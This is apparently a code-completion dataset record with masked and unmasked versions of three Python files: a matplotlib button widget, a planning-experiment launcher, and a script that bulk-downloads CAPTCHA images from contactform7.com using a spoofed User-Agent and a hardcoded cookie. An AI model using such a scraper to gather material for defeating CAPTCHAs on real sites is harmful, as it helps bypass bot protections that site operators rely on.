kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()]*self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n # check inputs are correct\n self.validate_inputs()\n # create buttons\n self.create_buttons()\n\n def validate_inputs(self):\n # Make sure button labels is in correct format\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button labels must be a list of strings\")\n # Make sure button actions is in correct format\n try:\n self.button_actions = 
list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button labels must be a list of strings\")\n # Make sure button actions is in correct format\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError(\"Button params must be a dictionary\")\n # Make sure list are not empty and same length\n if len(self.button_labels) < 1:\n raise ValueError(\"'button_labels' Must have at least one button \"\n \"label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\"'button_actions' must be the same length \"\n \"as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n # Make sure all button actions are supported\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = \"supported. \\n Currently supported actions are: \\n\"\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = (1. 
/ (b_N + 1)) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n\n # adjust the figure\n plt.subplots_adjust(bottom=0.25)\n # populate buttons\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n\n def next(self, event):\n \"\"\"\n Event for clicking a button with action \"NEXT\"\n \n Sets self.result to 1\n \n :param event: \n :return: \n \"\"\"\n self.result = 1\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval,\n maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue,\n minvalue=minval,\n maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n 
self.data[name] = value\n root.destroy()\n\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n # get mouse click location in pixels\n x, y = event.x, event.y\n # get the current canvas width and height (in pixels)\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n # loop round each button region\n for r, rn in enumerate(self.regions):\n # convert region to pixels\n rn1 = [rn[0]*width, rn[1]*height,\n (rn[0] + rn[2])*width, (rn[1] + rn[3])*height]\n # test whether x, y are in region\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\n# Main code to test the rectangle selector\nif __name__ == '__main__':\n import numpy as np\n # plt.close()\n # fig, frame = plt.subplots(ncols=1, nrows=1)\n # x = np.random.rand(100)\n # y = np.random.rand(100)\n # plt.scatter(x, y, color='k', marker='o', s=20)\n # odict = dict(close=True)\n # a = Add_Buttons(ax=frame,\n # button_labels=['A', 'B'],\n # button_actions=['OPTION', 'OPTION'],\n # button_params=[odict, odict])\n # plt.show()\n # plt.close()\n\n plt.close()\n fig, frame = plt.subplots(ncols=1, nrows=1)\n x = np.random.rand(100)\n y = np.random.rand(100)\n plt.scatter(x, y, color='k', marker='o', s=20)\n odict = dict(close=True)\n udict = dict(name='x', fmt=int, title='Enter value',\n comment='Please enter x in meters.', minval=4, maxval=10)\n a = Add_Buttons(ax=frame,\n button_labels=['Enter value', 'Close'],\n button_actions=['UINPUT', 'OPTION'],\n button_params=[udict, odict])\n plt.show()\n plt.close()\n\n# 
=============================================================================\n# End of code\n# =============================================================================\n",
"step-ids": [
6,
8,
9,
10,
13
]
}
|
[
6,
8,
9,
10,
13
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ap.add_argument('-o', '--output', required=True, help='Path to save the images'
)
ap.add_argument('-n', '--number', required=False, default=500, help=
'number of images to download')
<|reserved_special_token_0|>
for j in result:
print('\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
print(j.encode('ascii'))
r = s.get(j.encode('ascii'), headers=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]
)
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
<|reserved_special_token_0|>
while count < args['number']:
try:
s = requests.Session()
result = json.loads(s.post(url, headers=headers).content.decode(
'UTF-8'))
for j in range(3):
print(
'\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
r = s.get(result['captcha'][images[j]].encode('ascii'), headers
=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count
).zfill(5))])
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
except Exception:
print('\x1b[92m Error Downloading Webpage \x1b[00m')
time.sleep(1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
url = 'https://contactform7.com/captcha/'
headers = {'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15'
, 'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW',
'Connection': 'keep-alive', 'Cookie':
'lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611'
}
ap = argparse.ArgumentParser()
ap.add_argument('-o', '--output', required=True, help='Path to save the images'
)
ap.add_argument('-n', '--number', required=False, default=500, help=
'number of images to download')
args = vars(ap.parse_args())
s = requests.Session()
result = s.get(url, headers=headers).content.decode('UTF-8')
count = 1
result = re.findall('src="(.*[0-9]{1,}\\.png)"', result)
for j in result:
print('\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
print(j.encode('ascii'))
r = s.get(j.encode('ascii'), headers=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]
)
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
url = (
'https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback'
)
images = ['captcha-118', 'captcha-170', 'captcha-778']
while count < args['number']:
try:
s = requests.Session()
result = json.loads(s.post(url, headers=headers).content.decode(
'UTF-8'))
for j in range(3):
print(
'\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
r = s.get(result['captcha'][images[j]].encode('ascii'), headers
=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count
).zfill(5))])
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
except Exception:
print('\x1b[92m Error Downloading Webpage \x1b[00m')
time.sleep(1)
<|reserved_special_token_1|>
import requests
import re
import time
import os
import argparse
import json
url = 'https://contactform7.com/captcha/'
headers = {'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15'
, 'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW',
'Connection': 'keep-alive', 'Cookie':
'lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611'
}
ap = argparse.ArgumentParser()
ap.add_argument('-o', '--output', required=True, help='Path to save the images'
)
ap.add_argument('-n', '--number', required=False, default=500, help=
'number of images to download')
args = vars(ap.parse_args())
s = requests.Session()
result = s.get(url, headers=headers).content.decode('UTF-8')
count = 1
result = re.findall('src="(.*[0-9]{1,}\\.png)"', result)
for j in result:
print('\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
print(j.encode('ascii'))
r = s.get(j.encode('ascii'), headers=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]
)
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
url = (
'https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback'
)
images = ['captcha-118', 'captcha-170', 'captcha-778']
while count < args['number']:
try:
s = requests.Session()
result = json.loads(s.post(url, headers=headers).content.decode(
'UTF-8'))
for j in range(3):
print(
'\x1b[095m Downloading image \x1b[00m : \x1b[092m {}/{} \x1b[00m '
.format(count, args['number']))
r = s.get(result['captcha'][images[j]].encode('ascii'), headers
=headers)
p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count
).zfill(5))])
f = open(p, 'wb')
f.write(r.content)
f.close()
time.sleep(0.1)
count += 1
except Exception:
print('\x1b[92m Error Downloading Webpage \x1b[00m')
time.sleep(1)
<|reserved_special_token_1|>
import requests
import re
import time
import os
import argparse
import json

# Scrape CAPTCHA sample images from contactform7.com and save them to disk,
# first from the captcha demo page, then from the contact-form JSON endpoint.
url = "https://contactform7.com/captcha/"
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15',
           'Content-Type': "multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW", "Connection": "keep-alive",
           "Cookie": "lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611"
}

ap = argparse.ArgumentParser()
ap.add_argument("-o", "--output", required=True, help="Path to save the images")
# Fixed: coerce -n to int. A command-line value previously arrived as a str,
# making the `count < args["number"]` comparison below raise TypeError.
ap.add_argument("-n", "--number", required=False, default=500, type=int,
                help="number of images to download")
args = vars(ap.parse_args())
s = requests.Session()
result = s.get(url, headers=headers).content.decode("UTF-8")

count = 1
# Raw string fixes the invalid "\." escape (a warning today, an error in
# newer Python versions); the pattern itself is unchanged.
result = re.findall(r"src=\"(.*[0-9]{1,}\.png)\"", result)
for j in result:
    print("\033[095m Downloading image \033[00m : \033[092m {}/{} \033[00m ".format(count, args["number"]))
    print(j.encode("ascii"))
    r = s.get(j.encode("ascii"), headers=headers)
    p = os.path.sep.join([args["output"], "{}.jpg".format(str(count).zfill(5))])
    # Context manager guarantees the handle is closed even if the write fails.
    with open(p, "wb") as f:
        f.write(r.content)
    time.sleep(0.1)  # brief pause between requests
    count += 1

# Second source: the feedback endpoint returns three CAPTCHA image URLs as JSON.
url = "https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback"
images = ["captcha-118", "captcha-170", "captcha-778"]
while count < args["number"]:
    try:
        s = requests.Session()
        result = json.loads(s.post(url, headers=headers).content.decode("UTF-8"))
        for j in range(3):
            print("\033[095m Downloading image \033[00m : \033[092m {}/{} \033[00m ".format(count, args["number"]))
            r = s.get(result["captcha"][images[j]].encode("ascii"), headers=headers)
            p = os.path.sep.join([args["output"], "{}.jpg".format(str(count).zfill(5))])
            with open(p, "wb") as f:
                f.write(r.content)
            time.sleep(0.1)
            count += 1

    except Exception:
        # Best-effort scraping: report the failure and retry after a pause.
        print("\033[92m Error Downloading Webpage \033[00m")
        time.sleep(1)
|
flexible
|
{
"blob_id": "6990b5f34af654b4e1a39c3d73b6822fa48e4835",
"index": 9159,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nap.add_argument('-o', '--output', required=True, help='Path to save the images'\n )\nap.add_argument('-n', '--number', required=False, default=500, help=\n 'number of images to download')\n<mask token>\nfor j in result:\n print('\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n print(j.encode('ascii'))\n r = s.get(j.encode('ascii'), headers=headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]\n )\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n<mask token>\nwhile count < args['number']:\n try:\n s = requests.Session()\n result = json.loads(s.post(url, headers=headers).content.decode(\n 'UTF-8'))\n for j in range(3):\n print(\n '\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n r = s.get(result['captcha'][images[j]].encode('ascii'), headers\n =headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count\n ).zfill(5))])\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n except Exception:\n print('\\x1b[92m Error Downloading Webpage \\x1b[00m')\n time.sleep(1)\n",
"step-3": "<mask token>\nurl = 'https://contactform7.com/captcha/'\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15'\n , 'Content-Type':\n 'multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW',\n 'Connection': 'keep-alive', 'Cookie':\n 'lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611'\n }\nap = argparse.ArgumentParser()\nap.add_argument('-o', '--output', required=True, help='Path to save the images'\n )\nap.add_argument('-n', '--number', required=False, default=500, help=\n 'number of images to download')\nargs = vars(ap.parse_args())\ns = requests.Session()\nresult = s.get(url, headers=headers).content.decode('UTF-8')\ncount = 1\nresult = re.findall('src=\"(.*[0-9]{1,}\\\\.png)\"', result)\nfor j in result:\n print('\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n print(j.encode('ascii'))\n r = s.get(j.encode('ascii'), headers=headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]\n )\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\nurl = (\n 'https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback'\n )\nimages = ['captcha-118', 'captcha-170', 'captcha-778']\nwhile count < args['number']:\n try:\n s = requests.Session()\n result = json.loads(s.post(url, headers=headers).content.decode(\n 'UTF-8'))\n for j in range(3):\n print(\n '\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n r = s.get(result['captcha'][images[j]].encode('ascii'), headers\n =headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count\n ).zfill(5))])\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n except Exception:\n print('\\x1b[92m Error 
Downloading Webpage \\x1b[00m')\n time.sleep(1)\n",
"step-4": "import requests\nimport re\nimport time\nimport os\nimport argparse\nimport json\nurl = 'https://contactform7.com/captcha/'\nheaders = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15'\n , 'Content-Type':\n 'multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW',\n 'Connection': 'keep-alive', 'Cookie':\n 'lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611'\n }\nap = argparse.ArgumentParser()\nap.add_argument('-o', '--output', required=True, help='Path to save the images'\n )\nap.add_argument('-n', '--number', required=False, default=500, help=\n 'number of images to download')\nargs = vars(ap.parse_args())\ns = requests.Session()\nresult = s.get(url, headers=headers).content.decode('UTF-8')\ncount = 1\nresult = re.findall('src=\"(.*[0-9]{1,}\\\\.png)\"', result)\nfor j in result:\n print('\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n print(j.encode('ascii'))\n r = s.get(j.encode('ascii'), headers=headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count).zfill(5))]\n )\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\nurl = (\n 'https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback'\n )\nimages = ['captcha-118', 'captcha-170', 'captcha-778']\nwhile count < args['number']:\n try:\n s = requests.Session()\n result = json.loads(s.post(url, headers=headers).content.decode(\n 'UTF-8'))\n for j in range(3):\n print(\n '\\x1b[095m Downloading image \\x1b[00m : \\x1b[092m {}/{} \\x1b[00m '\n .format(count, args['number']))\n r = s.get(result['captcha'][images[j]].encode('ascii'), headers\n =headers)\n p = os.path.sep.join([args['output'], '{}.jpg'.format(str(count\n ).zfill(5))])\n f = open(p, 'wb')\n f.write(r.content)\n f.close()\n 
time.sleep(0.1)\n count += 1\n except Exception:\n print('\\x1b[92m Error Downloading Webpage \\x1b[00m')\n time.sleep(1)\n",
"step-5": "import requests\nimport re\nimport time\nimport os\nimport argparse\nimport json\n\nurl = \"https://contactform7.com/captcha/\"\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15',\n 'Content-Type': \"multipart/form-data; boundary=----WebKitFormBoundaryQgctpYC5kRiIjznW\",\"Connection\": \"keep-alive\",\n \"Cookie\": \"lang = en_US;_ga = GA1.2.765999315.1562601614;_gid = GA1.2.1701684676.1562913704;__cfduid = d695b369369d5130db03260060ed2edec1562601611\"\n}\n\nap=argparse.ArgumentParser()\nap.add_argument(\"-o\",\"--output\",required=True,help=\"Path to save the images\")\nap.add_argument(\"-n\",\"--number\",required=False,default=500,help=\"number of images to download\")\nargs=vars(ap.parse_args())\ns=requests.Session()\nresult = s.get(url, headers=headers).content.decode(\"UTF-8\")\n\ncount =1\nresult = re.findall(\"src=\\\"(.*[0-9]{1,}\\.png)\\\"\", result)\nfor j in result:\n print(\"\\033[095m Downloading image \\033[00m : \\033[092m {}/{} \\033[00m \".format(count, args[\"number\"]))\n print(j.encode(\"ascii\"))\n r = s.get(j.encode(\"ascii\"), headers=headers)\n p = os.path.sep.join([args[\"output\"], \"{}.jpg\".format(str(count).zfill(5))])\n f = open(p, \"wb\")\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count += 1\n\nurl = \"https://contactform7.com/wp-json/contact-form-7/v1/contact-forms/1209/feedback\"\nimages=[\"captcha-118\",\"captcha-170\",\"captcha-778\"]\nwhile count<args[\"number\"]:\n try:\n s = requests.Session()\n result = json.loads(s.post(url, headers=headers).content.decode(\"UTF-8\"))\n #print(result[\"captcha\"])\n #print(result[\"captcha\"][u'captcha-118'].encode(\"ascii\"))\n\n for j in range(3):\n print(\"\\033[095m Downloading image \\033[00m : \\033[092m {}/{} \\033[00m \".format(count,args[\"number\"]))\n # print(j.encode(\"ascii\"))\n r = s.get(result[\"captcha\"][images[j]].encode(\"ascii\"), headers=headers)\n p= 
os.path.sep.join([args[\"output\"],\"{}.jpg\".format(str(count).zfill(5))])\n f=open(p,\"wb\")\n f.write(r.content)\n f.close()\n time.sleep(0.1)\n count+=1\n\n except Exception:\n print(\"\\033[92m Error Downloading Webpage \\033[00m\")\n time.sleep(1)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import logging
import os
from os.path import exists, abspath, join, dirname
from os import mkdir

# Limit math-library threading; these must be set before numpy (and anything
# that loads it) is imported, which is why they sit between the import groups.
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["MP_NUM_THREADS"] = "1"  # NOTE(review): possibly meant OMP_NUM_THREADS — confirm

from smallab.runner_implementations.multiprocessing_runner import MultiprocessingRunner
from plannin_experiment import PlanningExperiment

# Quiet noisy third-party loggers.
mpl_logger = logging.getLogger('matplotlib')
mpl_logger.setLevel(logging.WARNING)
# Fixed typo: the logging.Logger attribute is `propagate` (was `propogate`,
# which silently created an unused attribute and left propagation enabled).
logging.getLogger("smallab").propagate = False

from smallab.specification_generator import SpecificationGenerator
from smallab.runner.runner import ExperimentRunner
from smallab.runner_implementations.main_process_runner import MainRunner
from itertools import product
from sample_sim.memory_mapper_utility import map_memory
from smallab.file_locations import get_experiment_save_directory
import sys
import numpy as np
# Entry point: generate experiment specifications for a fixed-allocation
# baseline and for our best-performing configuration, then run them all.
if __name__ == '__main__':
    # Normalise the working directory when launched from experiments/.
    if "experiments" in os.getcwd():
        os.chdir("../..")

    # Ensure the cache/parameter directories exist next to this script.
    this_dir = dirname(abspath(__file__))
    for dir_name in ('.cache', '.params'):
        path = join(this_dir, dir_name)
        if not exists(path):
            mkdir(path)


    # Experiment name may be overridden by the first command-line argument.
    if len(sys.argv) > 1:
        name = sys.argv[1]
    else:
        name = "IPP_POMCP"
    num_seeds = 5
    num_steps = 200
    # Settings shared by every generated specification.
    base_specs = {
        "plot": False,
        "file": ["fn:sbo"],
        "seed": list(range(num_seeds)),
        "objective_c": 10, # 10 for sbo, 100 for validation envs
        "state_space_dimensionality": [[50,50,200]], # for fn:sbo, [[62, 70, 5]], # for validation envs
        "rollout_number_goal": [num_steps * 150], # z_steps * 150
        "alpha_param": 6,
        "beta_param": 1,
        "epsilon": 10,
        "delta": 0.1,
        "sample_observations": False,
        "use_expected_improvement": False,
        "planning_steps": [num_steps],
    }

    # Baseline: commit to a fixed number of steps with a fixed rollout budget.
    gen_baseline = base_specs.copy()
    gen_baseline.update({
        "plan_commitment_algorithm": "n_steps",
        "plan_threshold": [1],
        "rollout_allocation_method": ["fixed"],
        "waste_unused_rollouts": [False],
    })
    specs_baseline = SpecificationGenerator().generate(gen_baseline)

    # Our best configuration: t-test plan commitment, beta-ugapeb allocation.
    gen_our_best = base_specs.copy()
    gen_our_best.update({
        "plan_commitment_algorithm":"tTest",
        "plan_threshold":[0.05],
        "rollout_allocation_method": ["beta-ugapeb"],
        "waste_unused_rollouts": [True],
    })
    specs_our_best = SpecificationGenerator().generate(gen_our_best)

    specifications = []
    specifications += specs_baseline
    specifications += specs_our_best

    print(f"Expt {name}:\t{len(specifications)/num_seeds} specs to run, over {num_seeds} seeds")
    # Print one representative spec (seed 0) per configuration for inspection.
    for spec in specifications:
        if spec["seed"] == 0:
            print(spec)

    runner = ExperimentRunner()
    # Memory-map the environment data before forking worker processes.
    map_memory(base_specs["file"], base_specs["state_space_dimensionality"])
    DEBUG = False

    if DEBUG:
        # Single-process run with exceptions propagated — easier to debug.
        runner.run(name, specifications, PlanningExperiment(), propagate_exceptions=True,
                   specification_runner=MainRunner(), use_dashboard=False, force_pickle=True, context_type="fork")
    else:
        gpus = 4
        jobs_per_gpu = 2
        # NOTE(review): `resources` is built but never passed to the runner — confirm intent.
        resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))
        runner.run(name, specifications, PlanningExperiment(), propagate_exceptions=False,
                   specification_runner=MultiprocessingRunner(), context_type="fork", use_dashboard=True,
                   force_pickle=True)
normal
|
{
"blob_id": "88d8d04dd7117daed0e976f3abc52c5d7bf18434",
"index": 9334,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmpl_logger.setLevel(logging.WARNING)\n<mask token>\nif __name__ == '__main__':\n if 'experiments' in os.getcwd():\n os.chdir('../..')\n this_dir = dirname(abspath(__file__))\n for dir_name in ('.cache', '.params'):\n path = join(this_dir, dir_name)\n if not exists(path):\n mkdir(path)\n if len(sys.argv) > 1:\n name = sys.argv[1]\n else:\n name = 'IPP_POMCP'\n num_seeds = 5\n num_steps = 200\n base_specs = {'plot': False, 'file': ['fn:sbo'], 'seed': list(range(\n num_seeds)), 'objective_c': 10, 'state_space_dimensionality': [[50,\n 50, 200]], 'rollout_number_goal': [num_steps * 150], 'alpha_param':\n 6, 'beta_param': 1, 'epsilon': 10, 'delta': 0.1,\n 'sample_observations': False, 'use_expected_improvement': False,\n 'planning_steps': [num_steps]}\n gen_baseline = base_specs.copy()\n gen_baseline.update({'plan_commitment_algorithm': 'n_steps',\n 'plan_threshold': [1], 'rollout_allocation_method': ['fixed'],\n 'waste_unused_rollouts': [False]})\n specs_baseline = SpecificationGenerator().generate(gen_baseline)\n gen_our_best = base_specs.copy()\n gen_our_best.update({'plan_commitment_algorithm': 'tTest',\n 'plan_threshold': [0.05], 'rollout_allocation_method': [\n 'beta-ugapeb'], 'waste_unused_rollouts': [True]})\n specs_our_best = SpecificationGenerator().generate(gen_our_best)\n specifications = []\n specifications += specs_baseline\n specifications += specs_our_best\n print(\n f'Expt {name}:\\t{len(specifications) / num_seeds} specs to run, over {num_seeds} seeds'\n )\n for spec in specifications:\n if spec['seed'] == 0:\n print(spec)\n runner = ExperimentRunner()\n map_memory(base_specs['file'], base_specs['state_space_dimensionality'])\n DEBUG = False\n if DEBUG:\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=True, specification_runner=MainRunner(),\n use_dashboard=False, force_pickle=True, context_type='fork')\n else:\n gpus = 4\n jobs_per_gpu = 2\n resources = list(product(list(range(gpus)), 
list(range(jobs_per_gpu))))\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=False, specification_runner=\n MultiprocessingRunner(), context_type='fork', use_dashboard=\n True, force_pickle=True)\n",
"step-3": "<mask token>\nos.environ['MKL_NUM_THREADS'] = '1'\nos.environ['MP_NUM_THREADS'] = '1'\n<mask token>\nmpl_logger = logging.getLogger('matplotlib')\nmpl_logger.setLevel(logging.WARNING)\nlogging.getLogger('smallab').propogate = False\n<mask token>\nif __name__ == '__main__':\n if 'experiments' in os.getcwd():\n os.chdir('../..')\n this_dir = dirname(abspath(__file__))\n for dir_name in ('.cache', '.params'):\n path = join(this_dir, dir_name)\n if not exists(path):\n mkdir(path)\n if len(sys.argv) > 1:\n name = sys.argv[1]\n else:\n name = 'IPP_POMCP'\n num_seeds = 5\n num_steps = 200\n base_specs = {'plot': False, 'file': ['fn:sbo'], 'seed': list(range(\n num_seeds)), 'objective_c': 10, 'state_space_dimensionality': [[50,\n 50, 200]], 'rollout_number_goal': [num_steps * 150], 'alpha_param':\n 6, 'beta_param': 1, 'epsilon': 10, 'delta': 0.1,\n 'sample_observations': False, 'use_expected_improvement': False,\n 'planning_steps': [num_steps]}\n gen_baseline = base_specs.copy()\n gen_baseline.update({'plan_commitment_algorithm': 'n_steps',\n 'plan_threshold': [1], 'rollout_allocation_method': ['fixed'],\n 'waste_unused_rollouts': [False]})\n specs_baseline = SpecificationGenerator().generate(gen_baseline)\n gen_our_best = base_specs.copy()\n gen_our_best.update({'plan_commitment_algorithm': 'tTest',\n 'plan_threshold': [0.05], 'rollout_allocation_method': [\n 'beta-ugapeb'], 'waste_unused_rollouts': [True]})\n specs_our_best = SpecificationGenerator().generate(gen_our_best)\n specifications = []\n specifications += specs_baseline\n specifications += specs_our_best\n print(\n f'Expt {name}:\\t{len(specifications) / num_seeds} specs to run, over {num_seeds} seeds'\n )\n for spec in specifications:\n if spec['seed'] == 0:\n print(spec)\n runner = ExperimentRunner()\n map_memory(base_specs['file'], base_specs['state_space_dimensionality'])\n DEBUG = False\n if DEBUG:\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=True, 
specification_runner=MainRunner(),\n use_dashboard=False, force_pickle=True, context_type='fork')\n else:\n gpus = 4\n jobs_per_gpu = 2\n resources = list(product(list(range(gpus)), list(range(jobs_per_gpu))))\n runner.run(name, specifications, PlanningExperiment(),\n propagate_exceptions=False, specification_runner=\n MultiprocessingRunner(), context_type='fork', use_dashboard=\n True, force_pickle=True)\n",
